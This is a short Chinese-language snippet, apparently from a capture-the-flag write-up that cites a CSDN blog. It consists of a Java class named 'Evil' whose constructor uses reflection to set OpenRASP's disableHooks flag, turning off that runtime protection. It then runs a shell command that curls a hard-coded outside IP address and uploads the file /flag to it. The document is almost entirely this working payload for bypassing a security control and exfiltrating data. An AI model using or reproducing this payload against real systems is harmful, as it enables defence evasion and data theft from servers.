参考: https://blog.csdn.net/rfrder/article/details/123242116
    修改配置信息关闭rasp,

    1. import java.io.BufferedReader;
    2. import java.io.FileReader;
    3. import java.net.HttpURLConnection;
    4. import java.net.URL;
    5. public class Evil {
    6. public Evil() throws Exception{
    7. Class<?> clz = Thread.currentThread().getContextClassLoader().loadClass("com.baidu.openrasp.config.Config");
    8. java.lang.reflect.Method getConfig = clz.getDeclaredMethod("getConfig");
    9. java.lang.reflect.Field disableHooks = clz.getDeclaredField("disableHooks");
    10. disableHooks.setAccessible(true);
    11. Object ins = getConfig.invoke(null);
    12. disableHooks.set(ins,true);
    13. Runtime.getRuntime().exec(new String[]{"/bin/sh","-c","curl http://121.5.169.223:39454 -F file=@/flag"});
    14. }
    15. }